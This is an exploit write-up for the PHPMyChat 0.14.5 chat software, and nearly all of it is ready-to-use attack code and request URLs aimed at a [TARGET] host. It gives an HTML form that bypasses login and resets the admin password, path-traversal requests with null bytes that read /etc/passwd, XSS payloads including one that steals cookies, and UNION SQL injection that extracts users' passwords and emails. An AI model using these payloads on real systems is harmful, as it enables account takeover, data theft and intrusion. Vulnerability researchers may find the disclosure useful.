PHPMyChat 0.14.5 ------------------------------------- http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script> http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script> ------------------------------------- 1) For non-authorized login it needs to send only one additional variable: do_not_login="false" Example: <HTML> <HEAD> <TITLE>phpMyChat exploit</TITLE> </HEAD> <BODY> <FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm"> <INPUT type="hidden" name="FORM_SEND" value="1"> <INPUT type="hidden" name="AUTH_USERNAME" value="admin"> <INPUT type="hidden" name="AUTH_PASSWORD" value="null"> <!-- INSERT --> <INPUT type="hidden" name="do_not_login" value="false"> <!-- END INSERT --> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR> <INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR> <INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR> <INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR> <INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR> <INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR> <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR> <INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR> <INPUT TYPE="text" NAME="EMAIL" VALUE="[email protected]"> <INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR> <INPUT TYPE="submit" NAME="submit_type" VALUE="Change"> </FORM> </BODY> </HTML> 2) To read files one needs to have the rights of administrator (read above for how to get them)! Variables "sheet" ? "what" are not filtered: require("./admin/admin${sheet}.php3"); and if (isset($What) && $What != "") include("./admin/admin".$What.".php3"); Example: http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00 http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00 and http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1 http://[TARGET]/chat/admin.php3?Fro.../../../etc/passwd�&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1 3) Cross-Site Scripting aka XSS In input.php3 form there's variable "C", in which the color of messages is transferred. Example: <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"> Code: "> <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \""> 4) Great number of variables aren't filtered: $sortBy, $sortOrder, $startReg, $U, $LastCheck and more ... Example SQL-injection: http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL] http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/* http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/* http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*
